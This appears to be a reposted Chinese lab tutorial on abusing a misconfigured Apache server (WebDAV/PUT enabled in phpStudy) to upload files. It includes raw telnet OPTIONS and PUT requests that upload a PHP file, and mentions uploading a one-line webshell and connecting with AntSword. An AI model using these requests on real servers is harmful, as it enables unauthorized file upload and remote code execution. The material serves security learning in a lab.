上传文件之PUT方法上传(服务器配置不当)
程序员文章站
2022-03-11 21:56:23
...
实验环境
Window server 2008 +phpstudy
文章目录
第一章 文件上传的条件
Web 服务器要开启文件上传功能,并且上传api(接口)对外“开放”(Web 用户可以访问);
Web 用户对目标目录具有可写权限,甚至具有执行权限,一般情况下,Web 目录都有执行权限。
要想完美利用文件上传漏洞,就是上传的文件可以执行,也就是Web 容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。
无视以上条件的情况就是服务器配置不当,开启了PUT 方法。
第二章window server2008开启telnet
【https://blog.csdn.net/qq_41901122/article/details/102159506】
window2008开启telnet服务
第三章 Apache 开启PUT 方法
第一节 测试Apache 是否开启了put 方法
telnet 192.168.139.136 80
----
OPTIONS / HTTP/1.1
HOST:172.16.132.161
----
第二节 apache 开启put 方法操作
第一步 开启Dav
1.开启模块
路径[C:\phpStudy\Apache\conf]
----
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
----
第二步 启用模块
第三步.开启文件锁
----
DavLockDB c:\phpstudy\www\DavLock
----
第四章文件上传案例
Telnet 192.168.139.136 80
----
PUT /infoa.php HTTP/1.1
HOST: 192.168.139.136
Content-Length: 18
<?php phpinfo();?>
----
尝试上传一句话木马–蚁剑链接
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
上一篇: Servlet
下一篇: 前端的Docker入门与实践
推荐阅读
-
HTML5 form标签之解放表单验证、增加文件上传、集成拖放的使用方法
-
Mac本地文件上传到CentOS云服务器方法
-
Bootstrap fileinput 上传新文件移除时触发服务器同步删除的配置
-
SpringBoot限制文件或图片上传大小的两种配置方法
-
Python 实现两个服务器之间文件的上传方法
-
Nginx学习之静态文件服务器配置方法
-
.NET实现文件跨服务器上传下载的方法
-
前端笔记之微信小程序(三)GET请求案例&文件上传和相册API&配置https
-
在Linux服务器和windows系统之间上传与下载文件的方法
-
云服务器tomcat配置虚拟路径映射,使上传文件与服务器及工程文件分离开